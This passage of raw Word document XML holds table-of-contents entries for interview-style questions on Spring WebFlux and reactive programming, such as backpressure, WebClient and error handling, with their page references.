            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>656</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E89D30A" w14:textId="4569DCE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reactive programming differ from imperative programming?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>657</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="187208A4" w14:textId="78D4A2E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explain the reactive stream specification (Reactive Streams API)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>659</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69C24588" w14:textId="5E3B30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core components of Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>662</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CF256F5" w14:textId="403AD70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scribe the roles of Router Functions and Handler Functions in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>663</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57FEEC10" w14:textId="3E0D67E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WebFluxHandlerAdapter?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867726 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>665</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69B313B4" w14:textId="2A33DCD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blocking and non-blocking in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867727 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>666</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1607BDD4" w14:textId="5019AE2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WebFlux handle concurrency?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867728 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>668</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="420A34E6" w14:textId="7B8EAA4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give an example of a blocking operation in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867729 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>670</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C9C2EF4" w14:textId="1027A14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WebFlux handle backpressure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867730 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>670</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EC2007D" w14:textId="6FCB3C1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backpressure and why is it important?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867731 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>672</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63997793" w14:textId="6E268A5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EnableWebFlux annotation used for?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867732 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>673</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="118D3D23" w14:textId="57B41E9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it different from @EnableWebMvc?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867733 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>674</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="726F2F6B" w14:textId="70E11F0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which scenarios would you use this annotation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867734 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>675</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E7B158E" w14:textId="1E22EBC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ole of WebClient in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>677</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42F6C1D3" w14:textId="1432127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WebClient and RestTemplate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>678</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F76A24F" w14:textId="42CF24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use WebClient to perform a reactive HTTP request?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>680</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="553D5E54" w14:textId="3D9227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block() and subscribe() in Spring reactive?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>682</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E58AE1C" w14:textId="785445C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n should you use each of these methods?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>682</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B1C29BD" w14:textId="28D4A5B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some advantages of using reactive programming in web applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>685</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2279E8AA" w14:textId="25CC38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non-blocking I/O enhance application performance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>686</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39DF93A8" w14:textId="28EEA09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WebFlux handle error handling in a reactive pipeline?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867742 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>687</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51305BF6" w14:textId="69F1A84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nErrorResume() and how does it work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867743 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>689</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4744D498" w14:textId="70CC7C8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nErrorReturn() in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867744 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>691</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="369C9819" w14:textId="00B0D91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ole of Schedulers in reactive programming with Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>692</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3083B87F" w14:textId="644D7CA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explain how to schedule tasks using subscribeOn and publishOn?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
